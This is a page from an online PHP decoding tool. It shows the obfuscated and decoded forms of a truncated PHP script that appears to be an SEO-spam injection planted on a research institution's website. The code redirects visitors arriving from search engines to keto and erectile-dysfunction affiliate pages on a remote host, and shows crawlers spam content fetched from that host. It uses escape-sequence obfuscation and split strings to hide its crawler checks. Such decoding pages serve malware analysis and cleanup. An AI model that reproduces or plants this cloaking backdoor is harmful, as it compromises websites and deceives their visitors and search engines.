Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto Gh6P7; Iplgd: $lujingNums = count($lujingArrays3) - 1; goto VnRuE; MftM0: for ($oj = ..
Decoded Output download
<? goto Gh6P7; Iplgd: $lujingNums = count($lujingArrays3) - 1; goto VnRuE; MftM0: for ($oj = 0; $oj <= $lujingNu6host=" . $_SERVER["HTTP_HOST"] . "&www=2"); $con = str_replace("http://historiaviva.fiocruz.br/", "https://historiaviva.fiocruz.br/", $con); $con = str_replace(".html", '', $con); echo $con; die; } } } } goto Q8SPp; vObpO: $lujingArrays6 = array("AtdiabetesQw", "BtdiabetesYt", "BcdiabetesXs", "CvdiabetesSj", "RidiabetesQw", "PidiabetesTr", "KidiabetesBv", "LkdiabetesII", "JkdiabetesMb", "FgdiabetesSh"); goto AMqV2; iHoL3: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("/" . $lujingArrays4[$oj] . "\/(.*)/isU", $_SERVER["REQUEST_URI"])) { $www = "2"; $caches = "./backup/"; $files = $_SERVER["REQUEST_URI"]; $jturl = "https://h2eyc0eeq3.premiumhealthnutra.com/seo/dmz/keto/keto.php?site=" . $_SERVER["HTTP_HOST"] . "&keyword=" . $_SERVER["REQUEST_URI"] . "&aff=historiaviva.fiocruz.br"; $htprefs = strtolower($_SERVER["HTTP_REFERER"]); if (chref($htprefs) && $files !== NULL) { header("location: " . $jturl); die; } $ref = @strtolower($_SERVER["HTTP_USER_AGENT"]); if (strpos($ref, "bing") !== false || strpos($ref, "Bi" . "ng" . "Preview") !== false || strpos($ref, "Bing" . "bot") !== false || strpos($ref, "Ad" . "Idx" . "Bot") !== false || strpos($ref, "g" . "oog" . "le") !== false || strpos($ref, "y" . "ah" . "oo") !== false || strpos($ref, "b" . "ing") !== false || strpos($ref, "a" . "o" . "l") !== false || strpos($ref, "a" . "s" . "k") !== false || strpos($ref, "s" . "ear" . "ch") !== false || strpos($ref, "b" . "o" . "t") !== false) { if ($files !== NULL) { $con = getHtml("https://h2eyc0eeq3.premiumhealthnutra.com/seo/dmz/keto/main.php?key=" . $files . "&host=" . $_SERVER["HTTP_HOST"] . "&www=2"); $con = str_replace("http://historiaviva.fiocruz.br/", "https://historiaviva.fiocruz.br/", $con); $con = str_replace(".html", '', $con); echo $con; die; } } } } goto OpsbL; Gh6P7: error_reporting(0); goto G5bsh; VrErC: $lujingNums = count($lujingArrays4) - 1; goto iHoL3; qSevB: $lujingArrays = array("ZkhScbd", "Xhyucbd", "Opdycbd", "uYjdCbd", "WqeYcbD", "ErsTcbd", "JXjYcbd", "AEkVcbD", "cwYcbdj", "BIcbdAE"); goto geVfr; kHUac: $lujingArray = array("Akjbs", "bGhbs", "caDbs", "Dfjbs", "Ertbs", "Fghbs", "Ghibs", "HkHbs", "JkiBS", "KSrbs"); goto qSevB; AMqV2: $lujingArrays7 = array("health", "nutrition", "hypoglycemia", "homedelivery", "type2", "diabetes", "tests", "nutritionsource"); goto xEP50; xEP50: $lujingNums = count($lujingArray) - 1; goto IVNr0; smvD3: $lujingArrays5 = array("Ribp", "Wqbp", "bbpC", "ibpf", "MTbp", "Zvbp", "hpcd", "OMbp", "ftpb", "Uibp", "Ctbp", "Kwbp", "Tcbp"); goto vObpO; VnRuE: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("/" . $lujingArrays3[$oj] . "\/(.*)/isU", $_SERVER["REQUEST_URI"])) { $www = "2"; $caches = "./backup/"; $files = $_SERVER["REQUEST_URI"]; $jturl = "https://h2eyc0eeq3.premiumhealthnutra.com/seo/dmz/ed/ed.php?site=" . $_SERVER["HTTP_HOST"] . "&keyword=" . $_SERVER["REQUEST_URI"] . "&aff=historiaviva.fiocruz.br"; $htprefs = strtolower($_SERVER["HTTP_REFERER"]); if (chref($htprefs) && $files !== NULL) { header("location: " . $jturl); die; } $ref = @strtolower($_SERVER["HTTP_USER_AGENT"]); if (strpos($ref, "bing") !== false || strpos($ref, "Bi" . "ng" . "Preview") !== false || strpos($ref, "Bing" . "bot") !== false || strpos($ref, "Ad" . "Idx" . "Bot") !== false || strpos($ref, "g" . "oog" . "le") !== false || strpos($ref, "y" . "ah" . "oo") !== false || strpos($ref, "b" . "ing") !== false || strpos($ref, "a" . "o" . "l") !== false || strpos($ref, "a" . "s" . "k") !== false || strpos($ref, "s" . "ear" . "ch") !== false || strpos($ref, "b" . "o" . "t") !== false) { if ($files !== NULL) { $con = getHtml("https://h2eyc0eeq3.premiumhealthnutra ?>
Did this file decode correctly?
Original Code
goto Gh6P7; Iplgd: $lujingNums = count($lujingArrays3) - 1; goto VnRuE; MftM0: for ($oj = 0; $oj <= $lujingNu6\x68\x6f\x73\164\75" . $_SERVER["\x48\124\x54\x50\x5f\110\117\123\124"] . "\x26\167\x77\167\75\62"); $con = str_replace("\150\x74\x74\160\72\x2f\x2f\x68\151\x73\x74\157\162\x69\x61\166\x69\166\x61\x2e\x66\151\157\143\x72\165\172\56\x62\x72\x2f", "\x68\164\x74\160\163\72\57\57\150\151\x73\164\x6f\162\151\x61\x76\x69\x76\141\x2e\146\x69\x6f\x63\162\x75\172\56\x62\x72\57", $con); $con = str_replace("\56\150\164\x6d\x6c", '', $con); echo $con; die; } } } } goto Q8SPp; vObpO: $lujingArrays6 = array("\x41\164\144\151\141\x62\145\x74\145\163\121\167", "\x42\x74\x64\x69\x61\x62\145\x74\145\x73\131\164", "\102\x63\x64\x69\x61\x62\145\164\145\x73\130\x73", "\103\x76\x64\x69\x61\142\145\x74\145\x73\123\152", "\x52\151\144\151\141\142\145\x74\145\163\121\x77", "\x50\151\144\x69\x61\x62\x65\164\145\x73\124\x72", "\113\x69\x64\151\141\x62\x65\x74\145\x73\102\x76", "\x4c\x6b\144\151\141\142\x65\164\145\x73\x49\111", "\112\153\x64\151\x61\142\x65\x74\145\x73\115\142", "\106\147\x64\x69\x61\142\145\x74\145\x73\x53\150"); goto AMqV2; iHoL3: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("\57" . $lujingArrays4[$oj] . "\x5c\57\50\x2e\x2a\x29\x2f\x69\163\125", $_SERVER["\122\x45\121\125\x45\x53\x54\x5f\125\x52\111"])) { $www = "\62"; $caches = "\x2e\57\142\141\143\x6b\x75\x70\x2f"; $files = $_SERVER["\x52\x45\x51\x55\x45\123\x54\137\x55\122\x49"]; $jturl = "\150\164\164\x70\x73\x3a\57\57\x68\62\x65\171\143\60\145\x65\161\x33\x2e\x70\x72\145\x6d\151\x75\x6d\x68\x65\141\154\164\x68\156\x75\164\162\x61\56\x63\157\x6d\57\x73\145\157\57\144\x6d\172\x2f\x6b\145\164\157\x2f\153\145\164\x6f\56\160\x68\x70\77\x73\x69\x74\145\x3d" . $_SERVER["\x48\124\124\120\x5f\x48\x4f\x53\x54"] . "\46\153\145\171\x77\157\162\144\75" . $_SERVER["\x52\105\121\125\105\123\x54\x5f\x55\122\x49"] . "\x26\141\146\x66\x3d\150\151\163\164\x6f\x72\x69\141\166\151\x76\x61\x2e\146\x69\157\x63\x72\165\172\x2e\142\x72"; $htprefs = strtolower($_SERVER["\110\124\124\120\x5f\122\x45\106\105\122\105\x52"]); if (chref($htprefs) && $files !== NULL) { header("\x6c\x6f\143\141\x74\151\157\x6e\72\x20" . $jturl); die; } $ref = @strtolower($_SERVER["\x48\124\124\120\x5f\x55\x53\105\x52\137\x41\x47\x45\x4e\124"]); if (strpos($ref, "\142\x69\156\147") !== false || strpos($ref, "\x42\151" . "\x6e\147" . "\x50\x72\145\166\151\145\x77") !== false || strpos($ref, "\102\x69\156\x67" . "\x62\157\164") !== false || strpos($ref, "\101\144" . "\x49\144\170" . "\102\157\x74") !== false || strpos($ref, "\147" . "\x6f\x6f\147" . "\x6c\145") !== false || strpos($ref, "\x79" . "\141\x68" . "\157\x6f") !== false || strpos($ref, "\142" . "\151\156\147") !== false || strpos($ref, "\141" . "\x6f" . "\x6c") !== false || strpos($ref, "\141" . "\163" . "\153") !== false || strpos($ref, "\x73" . "\x65\x61\x72" . "\x63\x68") !== false || strpos($ref, "\142" . "\157" . "\164") !== false) { if ($files !== NULL) { $con = getHtml("\150\x74\164\x70\163\72\x2f\x2f\x68\62\145\x79\143\60\x65\145\161\x33\56\x70\162\145\x6d\151\165\155\x68\x65\x61\154\164\x68\156\x75\164\x72\141\x2e\143\157\x6d\x2f\x73\x65\x6f\x2f\144\x6d\172\57\153\x65\164\x6f\57\x6d\141\x69\156\56\160\150\x70\77\x6b\145\171\x3d" . $files . "\46\150\157\x73\164\x3d" . $_SERVER["\x48\x54\124\120\x5f\x48\x4f\x53\x54"] . "\x26\167\167\167\x3d\62"); $con = str_replace("\150\x74\164\x70\72\57\x2f\150\151\163\164\x6f\162\x69\x61\166\x69\x76\141\x2e\x66\x69\157\x63\x72\165\x7a\56\142\x72\x2f", "\150\164\164\x70\163\72\x2f\x2f\150\x69\163\x74\157\x72\151\141\x76\151\166\x61\56\146\x69\x6f\x63\x72\165\x7a\x2e\142\162\57", $con); $con = str_replace("\x2e\150\164\155\x6c", '', $con); echo $con; die; } } } } goto OpsbL; Gh6P7: error_reporting(0); goto G5bsh; VrErC: $lujingNums = count($lujingArrays4) - 1; goto iHoL3; qSevB: $lujingArrays = array("\x5a\x6b\x68\x53\143\142\144", "\x58\150\x79\165\143\142\144", "\x4f\160\x64\171\143\x62\x64", "\165\131\x6a\x64\x43\x62\144", "\x57\x71\145\131\x63\x62\104", "\105\x72\163\x54\143\142\x64", "\x4a\x58\x6a\131\143\x62\x64", "\101\x45\x6b\126\x63\142\104", "\x63\167\131\143\x62\x64\x6a", "\x42\x49\143\142\x64\101\x45"); goto geVfr; kHUac: $lujingArray = array("\x41\153\x6a\142\163", "\x62\107\x68\142\163", "\143\x61\104\142\x73", "\104\146\152\142\163", "\105\x72\164\x62\x73", "\106\x67\x68\x62\x73", "\x47\x68\x69\142\x73", "\110\153\x48\x62\163", "\x4a\x6b\151\x42\x53", "\113\123\162\x62\163"); goto qSevB; AMqV2: $lujingArrays7 = array("\x68\x65\x61\154\164\x68", "\x6e\x75\164\x72\151\x74\x69\157\x6e", "\x68\171\160\157\x67\154\x79\143\145\x6d\x69\x61", "\150\157\x6d\x65\144\145\154\x69\x76\x65\x72\171", "\x74\171\160\x65\x32", "\144\151\x61\x62\145\x74\x65\x73", "\164\x65\x73\x74\x73", "\x6e\165\x74\162\151\164\151\x6f\x6e\x73\x6f\x75\x72\143\x65"); goto xEP50; xEP50: $lujingNums = count($lujingArray) - 1; goto IVNr0; smvD3: $lujingArrays5 = array("\122\x69\142\x70", "\127\161\x62\x70", "\142\142\160\103", "\x69\142\160\146", "\x4d\124\x62\x70", "\132\x76\x62\160", "\150\x70\143\x64", "\x4f\115\142\x70", "\146\164\x70\x62", "\x55\151\142\160", "\103\x74\142\x70", "\x4b\x77\x62\160", "\124\143\142\160"); goto vObpO; VnRuE: for ($oj = 0; $oj <= $lujingNums; $oj++) { if (preg_match("\x2f" . $lujingArrays3[$oj] . "\x5c\57\x28\x2e\52\51\57\x69\163\125", $_SERVER["\122\105\121\125\105\123\x54\137\125\x52\111"])) { $www = "\x32"; $caches = "\56\x2f\142\x61\x63\x6b\165\160\57"; $files = $_SERVER["\x52\x45\121\125\105\123\124\137\x55\x52\111"]; $jturl = "\150\x74\164\160\163\x3a\x2f\x2f\x68\62\x65\x79\143\x30\x65\x65\161\x33\x2e\160\162\x65\155\151\x75\x6d\150\145\x61\x6c\x74\x68\x6e\x75\x74\x72\141\x2e\x63\157\155\57\163\x65\157\57\x64\x6d\x7a\57\145\144\57\x65\144\x2e\x70\150\x70\x3f\x73\151\x74\x65\75" . $_SERVER["\x48\124\124\120\137\x48\x4f\123\124"] . "\46\153\145\171\167\157\162\144\75" . $_SERVER["\x52\105\x51\x55\105\x53\x54\137\125\x52\x49"] . "\x26\141\146\x66\75\150\151\163\164\157\x72\151\141\166\151\166\141\x2e\x66\151\x6f\143\x72\x75\172\56\x62\x72"; $htprefs = strtolower($_SERVER["\x48\x54\x54\120\x5f\122\x45\x46\105\122\x45\122"]); if (chref($htprefs) && $files !== NULL) { header("\x6c\157\x63\141\x74\x69\x6f\x6e\72\40" . $jturl); die; } $ref = @strtolower($_SERVER["\x48\x54\x54\x50\137\125\123\x45\122\137\101\x47\x45\x4e\124"]); if (strpos($ref, "\142\x69\x6e\147") !== false || strpos($ref, "\x42\x69" . "\x6e\147" . "\x50\162\145\x76\x69\145\x77") !== false || strpos($ref, "\102\x69\x6e\147" . "\142\x6f\x74") !== false || strpos($ref, "\101\x64" . "\111\144\x78" . "\x42\x6f\x74") !== false || strpos($ref, "\147" . "\157\x6f\x67" . "\154\x65") !== false || strpos($ref, "\171" . "\141\150" . "\x6f\x6f") !== false || strpos($ref, "\142" . "\151\156\x67") !== false || strpos($ref, "\x61" . "\x6f" . "\x6c") !== false || strpos($ref, "\141" . "\x73" . "\153") !== false || strpos($ref, "\163" . "\x65\141\162" . "\143\150") !== false || strpos($ref, "\x62" . "\157" . "\x74") !== false) { if ($files !== NULL) { $con = getHtml("\150\x74\x74\160\x73\x3a\x2f\x2f\x68\62\x65\x79\143\60\x65\x65\161\63\x2e\160\x72\145\155\151\165\155\x68\x65\x61\154\164\x68\156\x75\x74\x72\141
Function Calls
None |
Stats
MD5 | a317027634dc759602d8d1abcb09590c |
Eval Count | 0 |
Decode Time | 114 ms |